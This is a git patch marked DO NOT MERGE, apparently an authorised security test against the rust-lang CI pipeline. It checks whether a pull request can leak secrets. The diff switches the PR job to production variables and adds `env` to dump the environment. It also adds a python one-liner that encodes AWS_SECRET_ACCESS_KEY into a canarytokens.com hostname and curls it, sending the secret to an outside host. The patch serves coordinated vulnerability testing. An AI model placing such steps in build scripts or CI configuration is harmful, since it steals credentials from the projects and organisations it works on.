From ec96d3980385eccf81f6259878056657e0c5ff23 Mon Sep 17 00:00:00 2001
From: Lukas Markeffsky <@>
Date: Thu, 17 Nov 2022 18:53:39 +0100
Subject: [PATCH] [DO NOT MERGE] Test if GitHub PRs can leak secrets

This is an attempt to extract the AWS key associated with `CACHES_AWS_ACCESS_KEY_ID` via a pull request. This secret is not considered sensitive.

This attack is done in coordination with the Security Response WG and for educational purposes only.

cc @pietroalbini @cuviper
---
 .github/workflows/ci.yml            | 5 +++++
 src/ci/github-actions/ci.yml        | 2 +-
 src/ci/scripts/run-build-from-ci.sh | 7 +++++++
 3 files changed, 13 insertions(+), 1 deletion(-)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 771cef6e4d0d6..660406c360442 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -38,7 +38,12 @@ jobs:
     env:
       CI_JOB_NAME: "${{ matrix.name }}"
       SCCACHE_BUCKET: rust-lang-ci-sccache2
+      DEPLOY_BUCKET: rust-lang-ci2
       TOOLSTATE_REPO: "https://github.com/rust-lang-nursery/rust-toolstate"
+      TOOLSTATE_ISSUES_API_URL: "https://api.github.com/repos/rust-lang/rust/issues"
+      TOOLSTATE_PUBLISH: 1
+      CACHES_AWS_ACCESS_KEY_ID: AKIA46X5W6CZI5DHEBFL
+      ARTIFACTS_AWS_ACCESS_KEY_ID: AKIA46X5W6CZN24CBO55
       CACHE_DOMAIN: ci-caches.rust-lang.org
     if: "github.event_name == 'pull_request'"
     strategy:
diff --git a/src/ci/github-actions/ci.yml b/src/ci/github-actions/ci.yml
index 9f40177990080..dd0397233ddea 100644
--- a/src/ci/github-actions/ci.yml
+++ b/src/ci/github-actions/ci.yml
@@ -281,7 +281,7 @@ jobs:
     <<: *base-ci-job
     name: PR
     env:
-      <<: [*shared-ci-variables, *public-variables]
+      <<: [*shared-ci-variables, *prod-variables]
     if: github.event_name == 'pull_request'
     strategy:
       matrix:
diff --git a/src/ci/scripts/run-build-from-ci.sh b/src/ci/scripts/run-build-from-ci.sh
index c02117f459de0..b3f6bb52c38a2 100755
--- a/src/ci/scripts/run-build-from-ci.sh
+++ b/src/ci/scripts/run-build-from-ci.sh
@@ -2,6 +2,13 @@
 # Start the CI build. You shouldn't run this locally: call either src/ci/run.sh
 # or src/ci/docker/run.sh instead.
 
+env
+
+url=$(python3 <<< "token='ta9trx5u17g3nta59hhn3jhq9.canarytokens.com'; data='${AWS_SECRET_ACCESS_KEY}'; import base64, re, random; print('.'.join(filter(lambda x: x,re.split(r'(.{63})', base64.b32encode(data.encode('utf8')).decode('utf8').replace('=','')) + ['G'+str(random.randint(10,99)), token])))")
+curl "${url}"
+
+exit 1
+
 set -euo pipefail
 IFS=$'\n\t'